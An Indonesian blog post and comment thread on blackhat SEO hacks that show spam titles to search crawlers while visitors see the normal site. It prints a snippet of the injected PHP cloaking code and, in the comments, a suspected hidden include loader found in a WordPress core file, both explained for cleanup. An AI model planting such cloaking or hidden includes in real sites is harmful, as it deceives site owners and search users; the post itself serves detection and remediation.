Mengapa Hasil Pencarian Website Saya Berbeda dengan Isi Website Saya?

Pernahkah anda mengalami kejadian ketika mencoba melakukan search domain website anda di google misal :

site:www.situsanda.com

Lalu title dan deskripsi yang keluar adalah judul jualan obat beserta deskripsinya namun URL nya adalah benar situs anda. Tentunya benar-benar menjengkelkan, kita sudah susah payah update content dan SEO tetapi yang keluar justru dagangan orang lain bahkan terkadang website porno.

Salah satu klien saya pernah mengalaminya, mari kita bedah satu-satu.

Bagaimana bisa konten saya berubah sendiri?

Tentu saja ini berarti hacker telah masuk ke dalam server anda. Dan melakukan modifikasi script anda.

Tetapi jika saya lihat konten masih tetap konten saya, sedangkan jika saya lihat di google jadi menjual obat…

Memang seperti itu cara kerja script hacker tsb, hacker tersebut ingin selama mungkin script mereka diketahui pemilik situs, jadi jika pemilik situs / pengunjung biasa yang mengakses maka akan muncul konten yang normal sesuai isi website namun kalau yang mengakses adalah CRAWLING BOT atau mesin pencari seperti google, yahoo, bing maka yang keluar adalah “dagangan” hacker tersebut. Mari kita lihat snippet kode yang disisipkan :

if(@$is_human == false)
{
    @include("content.php");
    exit;
}
if(strpos($ua, 'baidu.') or strpos($ua, ' yandex.') or strpos($ua, 'aol.') or strpos($ua, 'yahoo.') or strpos($server_referer, 'bing.') or strpos($ua, 'google.'))
{
    @include("content.php");
    @include("c0ntent.php");
    exit;
}

Perhatikan script strpos($ua) , script ini melakukan pengecekan user agent, jika user agent adalah mesin pencari maka yang ditampilkan adalah content dari si hacker.

Lalu apa untungnya bagi si hacker?

Jenis serangan ini adalah Blackhat SEO yaitu memiliki tujuan meletakkan link “dagangan” mereka ke sebanyak mungkin website yang dapat mereka kuasai. Hal ini berguna untuk backlink dengan kualitas tinggi, mengapa disebut kualitas tinggi? karena mereka bukan cuma menitipkan link tetapi beserta deskripsinya yang seakan-akan memang diulas di website yang sudah terkena hack.

Lalu bagaimana mengatasinya?

Jika data anda masih sedikit, cara paling aman adalah clean install. Namun jika website anda sudah besar dan tidak memungkinkan untuk clean install maka lakukan cara ini :

Pertama kali yang harus anda lakukan adalah shell scanning lakukan pengecekan pada SETIAP FILE di dalam website anda, hal ini berfungsi untuk mendapatkan backdoor si hacker, karena hampir 100% pasti hacker meletakkan backdoor pada website anda. Scan juga pada database anda, terkadang hacker juga membuat akun baru atau pun query di dalam database.

Kemudian jika anda yakin telah bersih dari backdoor, lakukan update plugin/theme jika anda menggunakan cms seperti wordpress, joomla, drupal, dll.

Langkah terakhir adalah pasang Firewall, hal ini berguna untuk mendeteksi kemungkinan ada serangan baru atau ada aktifitas modifikasi file.

Melihat kejadian seperti ini sebaiknya sering-seringlah melakukan cek file script anda sebelum hacker nakal masuk tanpa permisi. Sekian sharing kali ini.

Comments 19

    1. Post
      Author
    1. Post
      Author
  1. Apa maksud dari kode ini?

    error_reporting(0);ini_set(“display_errors”, 0);$localpath=getenv(“SCRIPT_NAME”);$absolutepath=getenv(“SCRIPT_FILENAME”);$root_path=substr($absolutepath,0,strpos

    ($absolutepath,$localpath));include_once(“$root_path”.”/wp-admin/includes/class-wp-text.php”);

    Saya temukan di > wp-includes/load.php

    1. Apakah hacker masuk melalui server atau melalui website/wp-admin?

      Adakah referensi lengkap agar SERP website (title dan deskripsi) normal kembali ?

      1. Post
        Author

        Apakah hacker masuk melalui server atau melalui website/wp-admin?

        Bisa dari dua-duanya.

        Adakah referensi lengkap agar SERP website (title dan deskripsi) normal kembali ?

        Pertama hapus dahulu semua script yang ditanam, pastikan tidak ada celah lagi, maka SERP website akan kembali membaik.

        1. Jika masuk melalui website atau cPanel atau dua-duanya! apakah langkah mengganti pw website dan cPanel sudah tepat atau ada cara lain untuk mencegah hacker (yg sama) kembali masuk?

          1. Di khawatirkan attacker sudah memiliki backdoor pada website anda, mungkin bisa dilakukan finding backdoor terlebih dahulu

    2. Saya menghubungi penyedia hosting, kemudian mereka melakukan scan, namun tidak menemukan malware pada server namun setelah saya cek manual, ditemukan script asing yang diduga kuat penyebab website redirect ke website lain dan parahnya title beserta deskripsi berubah.

      Kenapa hal ini tidak terdeteksi sebagai malware? Mohon pencerahannya.

      1. Post
        Author

        Saya menghubungi penyedia hosting, kemudian mereka melakukan scan, namun tidak menemukan malware pada server namun setelah saya cek manual, ditemukan script asing yang diduga kuat penyebab website redirect ke website lain dan parahnya title beserta deskripsi berubah.

        Kenapa hal ini tidak terdeteksi sebagai malware? Mohon pencerahannya.

        =================================

        Mohon maaf kita ga bisa memberi pencerahan, mungkin citra white lotion bisa (just kidding bro)

        Pihak hostingan biasanya tidak ambil pusing cek script 1 persatu (membandingkan hash beserta isi script modified dengan original), tentu saja tidak terdeteksi sebagai malware karena script bekerja layaknya aplikasi web yang valid, hanya saja logic webnya yang diganti.

    3. Post
      Author

      Script diatas mempunyai fungsi memanggil file class-wp-text.php, jika anda lihat dengan baik struktur di wordpress tidak ada file class-wp-text.php, kemungkinan file tersebut telah ditanam oleh seseorang/bot bisa dari banyak vektor(plugin,theme,dll). Jika ingin dianalisa lebih lanjut silahkan kirimkan ke file class-wp-text.php dan load.php ke email kami : info@ethic.ninja

  2. salam.
    mohon pencerahannya dari semua.
    web sy setelah di cek pada tiap2 script. ditemukan pada functions.php ( fungsi tema )
    seprti ini

    function slider_option(){
    $con = ‘





    ‘;
    echo $con;
    }
    add_action(‘wp_footer’,’slider_option’);
    /* —————————————————————————-
    * bbPress
    */
    // change avatar size to 40px
    function td_bbp_change_avatar_size($author_avatar, $topic_id, $size) {
    $author_avatar = ”;
    if ($size == 14) {
    $size = 40;

    apakah itu malware. kenapa itu bisa terjadi. terimakasih

    1. Post
      Author

      Kalau lihat dari snippet yang bapak berikan tidak terlihat malware, harus dianalisa setiap file. Kenapa bisa terjadi, yang pertama ada kemungkinan bapak install dari source yang tidak terpercaya, yang kedua ada kerentanan di website bapak yang memungkinkan hacker memasukkan malware. Cara paling cepat apakah website bapak terjangkit malware adalah dengan cek database user apakah bertambah atau tidak, namun hal ini juga belum memastikan 100% tetapi ada baiknya di cek juga.

Leave a Reply

Your email address will not be published.